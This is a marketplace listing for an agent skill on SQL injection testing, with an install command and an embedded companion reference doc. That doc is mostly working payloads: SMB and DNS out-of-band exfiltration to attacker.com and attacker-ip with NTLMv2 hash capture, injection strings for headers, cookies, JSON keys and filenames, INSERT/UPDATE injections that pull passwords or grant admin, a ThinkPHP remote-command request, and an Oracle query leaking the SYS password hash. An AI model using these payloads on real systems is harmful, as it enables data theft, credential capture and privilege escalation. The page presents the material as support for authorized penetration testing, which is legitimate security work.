Sqli Sql Injection
Apply structured SQL injection techniques and real-world scenarios when reviewing or pentesting your own APIs and forms before release.
Overview
sqli-sql-injection is an agent skill most often used in Ship security (also Build backend integrations and Operate errors) that extends SQL injection testing with real-world injection points and out-of-band exfiltration
Install
npx skills add https://github.com/yaklang/hack-skills --skill sqli-sql-injectionWhat is this skill?
- Extended scenarios beyond SELECT-only training: INSERT, UPDATE, DELETE, ORDER BY, and API sort-parameter injection diffe
- KEY and URI injection matrix—JSON key names, path segments, headers, cookies, multipart filenames, and ORDER BY from sor
- SMB out-of-band exfiltration on Windows MySQL with LOAD_FILE, DNS hostname leakage, and NTLMv2 capture via Responder com
- Companion depth doc to SKILL.md with CVE-style case studies and engagement-oriented injection techniques.
- Injection-point table covers at least seven channels including JSON keys, URI paths, headers, cookies, multipart filenam
Adoption & trust: 1.2k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You ship forms and APIs backed by SQL but only test obvious GET/POST fields and miss headers, JSON keys, and write-path injection that attackers still exploit.
Who is it for?
Builders running authorized pre-release security review on their own SaaS, API, or admin backends who need scenario depth beyond basic UNION tutorials.
Skip if: Attacking third-party sites without permission, or teams wanting automated CI scanners only with no manual injection methodology.
When should I use this skill?
User needs SQL injection extended scenarios, real-world cases, OOB exfiltration techniques, or non-SELECT write-path injection guidance for authorized testing.
What do I get? / Deliverables
You gain a structured checklist of injection surfaces and techniques—including OOB SMB/DNS paths—to reproduce findings in authorized staging before production.
- Structured injection surface checklist for manual or agent-driven probes
- Scenario notes for SMB/DNS OOB and CVE-style case patterns from the companion doc
Recommended Skills
Journey fit
Spans multiple journey phases - primary shelf plus alternate fits below.
Canonical shelf is Ship security because injection testing belongs in pre-release hardening, though the same patterns inform validate prototypes and operate incident response. Security subphase covers offensive testing knowledge used to find and fix SQLi in parameters, headers, cookies, and less-tested injection points.
Where it fits
Map JSON key and path-segment injection risks while wiring dynamic ORDER BY from API sort parameters.
Run extended INSERT/UPDATE/DELETE and header/cookie injection checks in staging before production cutover.
Correlate suspicious query errors with OOB or KEY injection patterns documented for incident triage on your own service.
How it compares
Use as procedural pentest reference paired with your staging app—not as a generic linter that replaces parameterized queries and ORM discipline.
Common Questions / FAQ
Who is sqli-sql-injection for?
Solo developers and small teams with SQL-backed APIs who perform authorized security testing and want engagement-style SQLi scenarios in the agent.
When should I use sqli-sql-injection?
Use it in Ship security before launch, in Build backend integrations while designing query boundaries, and in Operate errors when investigating suspected injection in logs—always on systems you are allowed to test.
Is sqli-sql-injection safe to install?
The skill describes offensive techniques for defensive use; review Security Audits on this Prism page and restrict invocation to authorized environments you control.
SKILL.md
READMESKILL.md - Sqli Sql Injection
# SQL Injection — Extended Scenarios & Real-World Cases > Companion to [SKILL.md](./SKILL.md). Contains additional attack scenarios, CVE case studies, and injection techniques from real-world engagements. --- ## 1. SMB Out-of-Band Exfiltration (MySQL on Windows) When the MySQL server runs on Windows with outbound SMB allowed: ```sql SELECT LOAD_FILE(CONCAT('\\\\', (SELECT user()), '.attacker.com\\share')); -- Triggers SMB connection → DNS lookup with data in hostname -- More complete: SELECT LOAD_FILE(CONCAT('\\\\attacker-ip\\', user(), '\\l.txt')); -- SMB authentication attempt → attacker captures NTLMv2 hash via Responder ``` **Compared to DNS exfiltration**: SMB exfil can also leak NTLM hashes, enabling offline password cracking. DNS exfil is more reliable across firewalls. --- ## 2. KEY Injection / URI Injection Beyond GET/POST parameters, SQL injection may occur in less-tested locations: | Injection Point | Example | |---|---| | JSON key names | `{"admin' OR 1=1--": "value"}` — if key is used in column name | | URI path segments | `/api/users/1 OR 1=1` — if path param enters SQL | | HTTP headers | `X-Forwarded-For: 127.0.0.1' OR 1=1--` | | Cookie values | `session=abc' UNION SELECT...` | | Multipart filename | `filename="test' OR '1'='1.jpg"` | | ORDER BY from API sort param | `?sort=name;SELECT SLEEP(5)--` | --- ## 3. INSERT / DELETE / UPDATE Injection Differences Most SQLi training focuses on SELECT. Real applications use INSERT/UPDATE/DELETE with different exploitation strategies: ### INSERT Statement Injection ```sql -- Original: INSERT INTO logs (user, action) VALUES ('INPUT', 'login'); -- Injection in user field: INPUT: admin', 'login'), ('attacker', (SELECT password FROM users LIMIT 1))-- -- Result: INSERT INTO logs (user, action) VALUES ('admin', 'login'), ('attacker', 'actual_password')--', 'login'); -- Exfiltrates data into a visible log table ``` ### UPDATE Statement Injection ```sql -- Original: UPDATE users SET email='INPUT' WHERE id=5; -- Injection: '), admin=1 WHERE username='victim'-- -- Result: UPDATE users SET email=''), admin=1 WHERE username='victim'--' WHERE id=5; -- Escalates victim's privileges ``` ### DELETE Statement Injection ```sql -- Application's own statement (the injectable sink): DELETE FROM cart WHERE item_id='INPUT' AND user_id=5; -- Non-destructive proof: confirm injection with a time-based payload, not by widening the WHERE: -- Injection: 1' AND IF((SELECT 1),SLEEP(5),0)-- -- Note: a boolean payload (e.g. 1' OR '1'='1) would match every row (DoS / data destruction) — do not run it against real data. ``` --- ## 4. CVE Case: ThinkPHP5 SQL Injection ThinkPHP5 framework's `where` method improperly handles array parameters: ``` POST /index/think\app/invokefunction Content-Type: application/x-www-form-urlencoded function=call_user_func_array&vars[0]=system&vars[1][]=id ``` Error-based extraction using `updatexml`: ```sql id=1' AND updatexml(1, concat(0x7e, (SELECT user()), 0x7e), 1)-- ``` --- ## 5. CVE Case: Django GIS SQL Injection (CVE-2020-9402) Django's GIS `GeoQuerySet` methods (e.g., `annotate` with `RawSQL`) on Oracle backend allow error-based injection via `utl_inaddr.get_host_name`: ```sql -- Oracle error-based exfiltration: ' AND 1=utl_inaddr.get_host_name((SELECT user FROM dual))-- -- Oracle raises ORA-29257 containing the username in the error message -- DNS-based out-of-band on Oracle: ' AND 1=UTL_INADDR.GET_HOST_NAME((SELECT password FROM dba_users WHERE username='SYS')||'.attacker.com')-- ``` **Takeaway**: Oracle-specific functions (`utl_inaddr`, `utl_http`, `dbms_ldap`) are powerful OOB channels that bypass most firewall restrictions. --- ## 6. SQL Injection via Different SQL Verbs Applications may use different HTTP methods and SQL verbs for the same endpoint: ```text GET /api/items?id=1 → SELECT (read) POST /api/items → INSERT (create) PUT /api/items/1 → UPDATE (modify) DELETE /api/items/1 → DELETE (remov